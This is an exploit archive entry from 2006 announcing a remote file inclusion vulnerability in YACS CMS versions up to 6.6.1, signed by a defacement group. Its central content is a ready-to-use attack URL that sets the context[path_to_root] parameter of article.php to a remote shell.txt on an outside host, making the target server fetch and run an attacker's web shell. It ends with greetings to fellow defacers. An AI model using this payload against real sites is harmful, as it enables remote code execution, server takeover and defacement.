id: 764
date: 08/30/2006
title: YACS CMS <= 6.6.1 context[path_to_root] Remote File Include Vuln
author: MATASANOS
cves: 

================================================================
YACS CMS <= 6.6.1 context[path_to_root] Remote File Include Vuln
================================================================


##################################### matasanos ###################################
#                    YACS CMS (last version and maybe all) File Inclusion Vulnerability
#
#   affected software: YACS (Yet Another Community System)
#   vendor: yacs . you can donwload it from http://www.yetanothercommunitysystem.com
#   level: Highly Critical (muy critico)
# 
#
#################################################################################### 
#
#
#   http://[target]/[patch]/yacs/articles/article.php?context[path_to_root]=http://url--ataca.org/shell.txt?
#
# 
#
####################################################################################
#
#                                 found by MATASANOS                               
#                               LATIN AMERICAN DEFACERS
#
#
#      recuerdos a antrax,freak,piker,vampi,pennismen,destroy,groxo,vannovax,cvir,mathew



#  0day.today [2023-03-24]  #